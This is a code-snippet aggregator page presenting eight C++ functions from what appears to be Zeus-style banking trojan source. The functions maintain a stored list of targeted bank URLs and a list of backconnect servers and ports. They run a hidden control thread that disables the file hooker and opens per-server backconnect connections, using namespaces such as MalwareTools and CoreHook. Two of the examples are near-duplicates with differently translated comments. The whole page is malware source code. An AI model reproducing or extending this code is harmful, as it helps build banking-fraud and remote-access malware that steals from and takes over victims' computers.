Exemplo n.º 1
0
void WINAPI bank::proc(void* p)
{
	
	while(WaitForSingleObject(eventHandle, INFINITE) == WAIT_OBJECT_0)
	{
		BinStorage::STORAGE *config = LocalConfig::getCurrent();
	
		if(config != NULL)
		{
		
			EnterCriticalSection(&csupd);
			DWORD itemListSize;
			LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
			
			if(itemList != NULL && isValidList(itemList, itemListSize))
			{
				Mem::reallocEx(&urls, (itemListSize)*sizeof(char));
				Mem::_copy(urls, itemList, itemListSize);
				urlsSize = itemListSize;
			}
			LeaveCriticalSection(&csupd);
			Mem::free(itemList);
			Mem::free(config);
		
		} 
	}
	
}
Exemplo n.º 2
0
void bank::init()
{
	InitializeCriticalSection(&csupd);
	BinStorage::STORAGE *config = LocalConfig::getCurrent();
    if(config != NULL)
    {
      DWORD itemListSize;
      LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
        
      if(itemList != NULL && isValidList(itemList, itemListSize))
      { 
		if(urls != NULL) Mem::free(urls);
        urls = (LPSTR)Mem::copyEx(itemList, itemListSize);
		urlsSize = itemListSize;
		
      }
	  

      Mem::free(itemList);
      Mem::free(config);
    }
	WCHAR objectName[50];
	Core::generateObjectName(Core::OBJECT_ID_BANK_LIST_ARRIVED, objectName, MalwareTools::KON_SESSION);
	eventHandle = CWA(kernel32, CreateEventW)(&coreData.securityAttributes.saAllowAll, TRUE, FALSE, objectName);
	Core::generateObjectName(Core::OBJECT_ID_REPORTS_SENSETIVE, objectName, MalwareTools::KON_SESSION);
	sensetiveHandle = CWA(kernel32, CreateEventW)(&coreData.securityAttributes.saAllowAll, TRUE, FALSE, objectName);
    CWA(kernel32, CreateThread)(NULL,0,(LPTHREAD_START_ROUTINE)proc,NULL,0, NULL);
}
Exemplo n.º 3
0
bool bank::_addStatic(LPSTR url)
{
	WORD newItemSize;
  char newItem[256 + 1 + 1];

  //Генирируем элемент.
  {
    BYTE urlLen = (BYTE)Str::_LengthA(url);
    char *offset        = newItem;
    
    if(urlLen == 0)return false;

    newItemSize = (urlLen + 1);

    Str::_CopyA(offset, url, urlLen);

    CWA(user32, CharLowerBuffA)(newItem, newItemSize);
  }
  
  //Открываем конфигурацию.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;
    
  //Получем список сущетвующих элементов.
  bool ok = true;
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);

  //Если элемент существует, ищим клон.
  if(isValidList(itemList, itemListSize))
  {
    LPSTR curItem = itemList;
    do
    {
		
      //Проверяем доступно ли места больше чем, размер искомого элемента.
      if((DWORD)((itemList + itemListSize) - curItem) <= newItemSize)break;
      
      //Сравниваем.
      if(Mem::_compare(curItem, newItem, newItemSize) == 0)
      {
        WDEBUG0(WDDT_INFO, "Item already exists.");
        ok = false;
        break;
      }
    }
    while((curItem = Str::_multiStringGetIndexA(curItem, 1)) != NULL);
    
    if(ok == true && (ok = Mem::reallocEx(&itemList, itemListSize + newItemSize)) == true)
    {
		
      Mem::_copy2(itemList + itemListSize - 1, newItem, newItemSize + 1);
      ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, itemList, itemListSize + newItemSize);
    }
  }
  //Если элемент не найден, добавляем новый.
  else
  {
    if(itemList == NULL)ok = BinStorage::_addItem(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
    else                ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
  }
  Mem::free(itemList);

  if(ok == false)
  {
    Mem::free(config);
    config = NULL;
  }
  ok = LocalConfig::endReadWrite(config);
  if(ok)PulseEvent(eventHandle);
  return ok;
}
Exemplo n.º 4
0
bool bank::_removeStatic(LPSTR url)
{
	//Загружаем конфиг.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;

  //Получаем список элементов.
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
  
  //Элементов нет.
  if(itemList == NULL)
  {
    Mem::free(config);
    return LocalConfig::endReadWrite(NULL);
  }

  //Проверяем правильность списка.
  bool changed = false;
  if(isValidList(itemList, itemListSize))
  {
    //Создаем копию списка для копирования в него, элементов не попавших под маску.
    LPSTR newItemList = (LPSTR)Mem::alloc(itemListSize);    
    if(newItemList != NULL)  
    {
      //Ишим элементы.
      LPSTR curItem = itemList;
      LPSTR offset  = newItemList;
      int len;

      do
      {
        LPSTR curUrl = curItem;

        if(Str::_matchExA(url, curUrl))
        {
          changed = true;
        }
        else
        {
          len = Str::_LengthA(curUrl);
          Str::_CopyA(offset, curUrl, len);
          offset += len + 1;

          *offset = 0; //Завершающий байт мульти-строки.
        }
      }
      while((curItem = Str::_multiStringGetIndexA(curItem, 1)) != NULL);
      
      if(changed == true)
      {
        if(offset == newItemList)offset--; //Почти аналог BinStorage::ITEMF_COMBINE_DELETE.
        changed = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BANK_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItemList, offset - newItemList + 1);
      }
      Mem::free(newItemList);
    }
  }
  Mem::free(itemList);

  if(changed == false)
  {
    Mem::free(config);
    config = NULL;
  }

  return LocalConfig::endReadWrite(config);
}
Exemplo n.º 5
0
bool BackconnectBot::_addStatic(LPSTR servicePort, LPSTR server, LPSTR serverPort)
{
  WORD newItemSize;
  char newItem[256 * 3 + 3 + 1];

  //Генирируем элемент.
  {
    BYTE servicePortLen = (BYTE)Str::_LengthA(servicePort);
    BYTE serverLen      = (BYTE)Str::_LengthA(server);
    BYTE serverPortLen  = (BYTE)Str::_LengthA(serverPort);
    char *offset        = newItem;
    
    if(servicePortLen == 0 || serverLen == 0 || serverPortLen == 0)return false;

    newItemSize = (servicePortLen + 1) + (serverLen + 1) + (serverPortLen + 1);

    Str::_CopyA(offset, servicePort, servicePortLen);
    offset += servicePortLen + 1;

    Str::_CopyA(offset, server, serverLen);
    offset += serverLen + 1;

    Str::_CopyA(offset, serverPort, serverPortLen);
    offset += serverPortLen + 1;

    *offset = 0; //Завершающий байт мульти-строки.
    
    CWA(user32, CharLowerBuffA)(newItem, newItemSize);
  }
  
  //Открываем конфигурацию.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;
    
  //Получем список сущетвующих элементов.
  bool ok = true;
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);

  //Если элемент существует, ищим клон.
  if(isValidList(itemList, itemListSize))
  {
    LPSTR curItem = itemList;
    do
    {
      //Проверяем доступно ли места больше чем, размер искомого элемента.
      if((DWORD)((itemList + itemListSize) - curItem) <= newItemSize)break;
      
      //Сравниваем.
      if(Mem::_compare(curItem, newItem, newItemSize) == 0)
      {
        WDEBUG0(WDDT_INFO, "Item already exists.");
        ok = false;
        break;
      }
    }
    while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);
    
    if(ok == true && (ok = Mem::reallocEx(&itemList, itemListSize + newItemSize)) == true)
    {
      Mem::_copy(itemList + itemListSize - 1, newItem, newItemSize + 1);
      ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, itemList, itemListSize + newItemSize);
    }
  }
  //Если элемент не найден, добавляем новый.
  else
  {
    if(itemList == NULL)ok = BinStorage::_addItem(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
    else                ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
  }
  Mem::free(itemList);

  if(ok == false)
  {
    Mem::free(config);
    config = NULL;
  }

  return LocalConfig::endReadWrite(config);
}
Exemplo n.º 6
0
/*
  Поток для для создания контроля бэконектов.

  Return - 0.
*/
static DWORD WINAPI proc(void *)
{
  CoreHook::disableFileHookerForCurrentThread(true);
  HANDLE mutex = Core::waitForMutexOfObject(Core::OBJECT_ID_BACKCONNECT_CONTROL, MalwareTools::KON_GLOBAL);
  if(mutex == NULL)
  {
    WDEBUG0(WDDT_ERROR, "Failed");
    return 1;
  }
  
  CWA(kernel32, SetThreadPriority)(CWA(kernel32, GetCurrentThread)(), THREAD_PRIORITY_IDLE);

  WDEBUG0(WDDT_INFO, "Started.");
#if(BO_DEBUG > 0)
  if(Core::isActive())while(CWA(kernel32, WaitForSingleObject)(coreData.globalHandles.stopEvent, 1000) == WAIT_TIMEOUT)
#else
  if(Core::isActive())while(CWA(kernel32, WaitForSingleObject)(coreData.globalHandles.stopEvent, 60 * 1000) == WAIT_TIMEOUT)
#endif
  {
    BinStorage::STORAGE *config = LocalConfig::getCurrent();
    if(config != NULL)
    {
      DWORD itemListSize;
      LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
        
      if(itemList != NULL && isValidList(itemList, itemListSize))
      {
        LPSTR curItem = itemList;
        do
        {
          LPSTR curServicePort = curItem;
          LPSTR curServer      = Str::_multiStringGetIndexA(curItem, 1);
          LPSTR curServerPort  = Str::_multiStringGetIndexA(curItem, 2);

          //Генерируем мютекс.
          HANDLE bcMutex = NULL;
          {
            DWORD nameParts[3];
            nameParts[0] = Crypt::crc32Hash(curServicePort, Str::_LengthA(curServicePort));
            nameParts[1] = Crypt::crc32Hash(curServer, Str::_LengthA(curServer));
            nameParts[2] = Crypt::crc32Hash(curServerPort, Str::_LengthA(curServerPort));

            WCHAR mutexName[7 + 3 * 8 + 1];
            if(Str::_sprintfW(mutexName, sizeof(mutexName) / sizeof(WCHAR), L"Global\\%08X%08X%08X", nameParts[0], nameParts[1], nameParts[2]) == sizeof(mutexName) / sizeof(WCHAR) - 1)
            {
              WDEBUG1(WDDT_INFO, "mutexName=[%s]", mutexName);
              bcMutex = Sync::_createUniqueMutex(&coreData.securityAttributes.saAllowAll, mutexName);
            }
          }

          //Создаем дочерный поток.
          if(bcMutex != NULL)
          {
            BCDATA *bcData = (BCDATA *)Mem::alloc(sizeof(BCDATA));
            if(bcData != NULL)
            {
              bcData->servicePort = Str::_CopyExA(curServicePort, -1);
              bcData->server      = Str::_CopyExA(curServer, -1);
              bcData->serverPort  = Str::_CopyExA(curServerPort, -1);
              bcData->mutex       = bcMutex;

              if(bcData->servicePort != NULL && bcData->server != NULL && bcData->serverPort != NULL)
              {
                if(Process::_createThread(512 * 1024, procConnection, bcData) > 0)continue;
              }

              Mem::free(bcData->servicePort);
              Mem::free(bcData->server);
              Mem::free(bcData->serverPort);
              Mem::free(bcData);
            }
            Sync::_freeMutex(bcMutex);
          }
        }
        while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);
      }

      Mem::free(itemList);
      Mem::free(config);
    }
  }  
  
  WDEBUG0(WDDT_INFO, "Stopped.");
  Sync::_freeMutex(mutex);

  return 0;
}
Exemplo n.º 7
0
bool BackconnectBot::_removeStatic(LPSTR servicePort, LPSTR server, LPSTR serverPort)
{
  //Load config.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;

  //Get a list of items.
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);
  
  //No items.
  if(itemList == NULL)
  {
    Mem::free(config);
    return LocalConfig::endReadWrite(NULL);
  }

  //Check the correctness of the list.
  bool changed = false;
  if(isValidList(itemList, itemListSize))
  {
    //Create a copy of the list to be copied into it, the elements do not fall under the mask.
    LPSTR newItemList = (LPSTR)Mem::alloc(itemListSize);    
    if(newItemList != NULL)  
    {
      //Ishim elements.
      LPSTR curItem = itemList;
      LPSTR offset  = newItemList;
      int len;

      do
      {
        LPSTR curServicePort = curItem;
        LPSTR curServer      = Str::_multiStringGetIndexA(curItem, 1);
        LPSTR curServerPort  = Str::_multiStringGetIndexA(curItem, 2);

        if(Str::_matchExA(servicePort, curServicePort) && Str::_matchExA(server, curServer) && Str::_matchExA(serverPort, curServerPort))
        {
          changed = true;
        }
        else
        {
          len = Str::_LengthA(curServicePort);
          Str::_CopyA(offset, curServicePort, len);
          offset += len + 1;

          len = Str::_LengthA(curServer);
          Str::_CopyA(offset, curServer, len);
          offset += len + 1;

          len = Str::_LengthA(curServerPort);
          Str::_CopyA(offset, curServerPort, len);
          offset += len + 1;

          *offset = 0; //The final multi-byte string.
        }
      }
      while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);
      
      if(changed == true)
      {
        if(offset == newItemList)offset--; //Almost analog BinStorage:: ITEMF_COMBINE_DELETE.
        changed = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItemList, offset - newItemList + 1);
      }
      Mem::free(newItemList);
    }
  }
  Mem::free(itemList);

  if(changed == false)
  {
    Mem::free(config);
    config = NULL;
  }

  return LocalConfig::endReadWrite(config);
}
Exemplo n.º 8
0
bool BackconnectBot::_addStatic(LPSTR servicePort, LPSTR server, LPSTR serverPort)
{
  WORD newItemSize;
  char newItem[256 * 3 + 3 + 1];

  //Geniriruem element.
  {
    BYTE servicePortLen = (BYTE)Str::_LengthA(servicePort);
    BYTE serverLen      = (BYTE)Str::_LengthA(server);
    BYTE serverPortLen  = (BYTE)Str::_LengthA(serverPort);
    char *offset        = newItem;
    
    if(servicePortLen == 0 || serverLen == 0 || serverPortLen == 0)return false;

    newItemSize = (servicePortLen + 1) + (serverLen + 1) + (serverPortLen + 1);

    Str::_CopyA(offset, servicePort, servicePortLen);
    offset += servicePortLen + 1;

    Str::_CopyA(offset, server, serverLen);
    offset += serverLen + 1;

    Str::_CopyA(offset, serverPort, serverPortLen);
    offset += serverPortLen + 1;

    *offset = 0; //The final multi-byte string.
    
    CWA(user32, CharLowerBuffA)(newItem, newItemSize);
  }
  
  //Open the configuration.
  BinStorage::STORAGE *config = LocalConfig::beginReadWrite();
  if(config == NULL)return false;
    
  //Suschetvuet obtain a list of items.
  bool ok = true;
  DWORD itemListSize;
  LPSTR itemList = (LPSTR)BinStorage::_getItemDataEx(config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING, &itemListSize);

  //If the element exists ischim clone.
  if(isValidList(itemList, itemListSize))
  {
    LPSTR curItem = itemList;
    do
    {
      //Check whether the place is more than the size of the desired item.
      if((DWORD)((itemList + itemListSize) - curItem) <= newItemSize)break;
      
      //Compare.
      if(Mem::_compare(curItem, newItem, newItemSize) == 0)
      {
        WDEBUG0(WDDT_INFO, "Item already exists.");
        ok = false;
        break;
      }
    }
    while((curItem = Str::_multiStringGetIndexA(curItem, 3)) != NULL);
    
    if(ok == true && (ok = Mem::reallocEx(&itemList, itemListSize + newItemSize)) == true)
    {
      Mem::_copy(itemList + itemListSize - 1, newItem, newItemSize + 1);
      ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, itemList, itemListSize + newItemSize);
    }
  }
  //If none are found, we add a new one.
  else
  {
    if(itemList == NULL)ok = BinStorage::_addItem(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
    else                ok = BinStorage::_modifyItemById(&config, LocalConfig::ITEM_BACKCONNECT_LIST, BinStorage::ITEMF_IS_SETTING | BinStorage::ITEMF_COMBINE_OVERWRITE, newItem, newItemSize + 1);
  }
  Mem::free(itemList);

  if(ok == false)
  {
    Mem::free(config);
    config = NULL;
  }

  return LocalConfig::endReadWrite(config);
}